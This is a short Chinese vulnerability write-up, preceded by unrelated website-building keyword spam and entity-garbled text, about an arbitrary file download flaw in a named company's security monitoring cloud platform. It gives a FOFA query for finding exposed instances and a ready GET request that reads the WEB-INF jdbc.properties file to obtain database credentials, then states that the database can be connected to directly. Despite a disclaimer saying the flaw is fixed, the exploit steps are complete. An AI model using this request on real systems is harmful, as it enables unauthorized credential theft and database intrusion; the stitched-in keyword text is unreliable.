网站建设公司哪家好?,怎么做静态网站,文化局网站建设方案,学做网站论坛vip视频免责声明#xff1a;
**文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何…免责声明
**文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行 **
一漏洞描述
深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞攻击者可通过此漏洞获得登录账号密码以进行后续测试。
二漏洞影响版本
鸿运主动安全监控云平台
三网络空间测绘查询
fofa body./open/webApi.html
四漏洞复现
GET /808gps/MobileAction_downLoad.action?path/WEB-INF/classes/config/jdbc.properties
五漏洞利用
读取到数据库账号密码直接连接
